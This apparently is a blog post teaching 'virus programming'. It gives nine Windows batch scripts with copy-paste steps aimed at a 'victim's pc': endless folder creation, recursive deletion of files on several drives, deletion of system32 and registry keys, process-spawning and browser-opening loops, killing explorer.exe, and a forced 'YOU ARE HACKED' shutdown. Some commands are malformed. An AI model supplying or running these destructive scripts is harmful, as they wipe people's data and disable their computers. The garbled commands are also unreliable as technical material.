Learn virus programming
(with source code)
DISCLAIMER:-I'll teach you virus programming but any kind of mistake or mishap's can harm your pc. I shall not be responsible for any kind of destruction. You can do this at your own risk.
ABOUT:
In this blog post, we learn about virus programming, There codes and there effects on pc
⦁ 1st virus program:
Create Unlimited Folders:
In the first virus program we learn how to create Unlimited Folders in Victim's pc. Due to this virus, the victim's pc become crashed.
This virus program generates "n" number of folders in computer partitions, this is a highly effective virus program
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
cd /d F:
md %RANDOM%
cd /d G:
md %RANDOM%
goto VIRUS
NOTE: Save the above CODE in .bat extension.
⦁ 2nd virus program:
Create folders on desktop:
In this virus program we learn how to create a virus that creates unlimited folders in the desktop of the victim's pc. This virus makes computer crash if this virus doesn't stop this make your computer a piece of shit.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
cd"C:\documents and settings\All users\desktop"
:folder
md %random%
goto folder
NOTE: Save the above CODE in .bat extension.
⦁ 3rd virus program:
Format all drives;
In this virus program, I'll teach you how to create a virus which has the ability to format all computer drives/partitions.
This is also a very effective & dangerous virus program that can delete all your data in seconds.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
NOTE: Save the above CODE in .bat extension.
⦁ 4th virus program:
Delete window OS:
In this virus program I'll teach you a virus code which has ability to Delete Window Operating System.
All the files of Window's and all the data in C partition delete by executing this virus program in victim's pc.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
del c:\WINDOWS\system32\*.*/q
NOTE: Save the above CODE in .bat extension
5th virus program:
Delete Window Registry Files:
In this virus program, I'll teach you that how you can delete registry files of victim's pc by only a small batch file virus program.
This virus program deletes all registry files of Windows Os and the window become a piece of shit. Window becomes useless after executing this virus program.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dil
START reg delete HKCR/*
NOTE: Save the above CODE in .bat extension
6th virus program
Lag the pc:
In this virus program, I'll teach you how you can create a virus program that has the ability to Lag the pc by open command prompt again.
By generating a large number of requests to open command prompt pc will lag. This is also an effective virus.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
:A
Start
goto :A
NOTE: Save the above CODE in .bat extension
7th virus program:
Lag the pc:
In this virus program, I'll teach you how you can create a virus program that has the ability to Lag the pc by open websites in the background again.
By generating a large number of requests to open websites pc will lag. Maybe the window will corrupt. This is also an effective virus.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
:a
start www.youtube.com
start www.youtube.com
start www.youtube.com
start www.twitter.com
start www.yahoo.com
start www.google.com
start www.instagram.com
goto :a
NOTE: Save the above CODE in .bat extension
8th virus program:
Taskkill virus:
in this virus program, I'll teach you how to create a virus program that has ability to kill all the tasks that pc is performed.
This virus program is very small but its work is big. It can kill all the tasks and those tasks which are performed by pc in the background.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
@echo off
taskkill explorer.exe
NOTE: Save the above CODE in .bat extension
9th virus program
Shutdown pc:
In this virus program, I'll teach you how to shutdown the victim's pc remotely. You only Execute the below virus program. After 30 seconds the pc will shut down automatically.
1. First open NOTEPAD.
2. Then copy the below code and paste in NOTEPAD.
3. save the NOTEPAD file as .bat extension.
forexample(index.bat).
CODE:
shutdown -s -t 30 -c "YOU ARE HACKED"
NOTE: Save the above CODE in .bat extension
Visit my youtube channel https://www.youtube.com/watch?v=5PrSku288LA&t=247s
CHECK THIS
CHECK THIS
0 Comments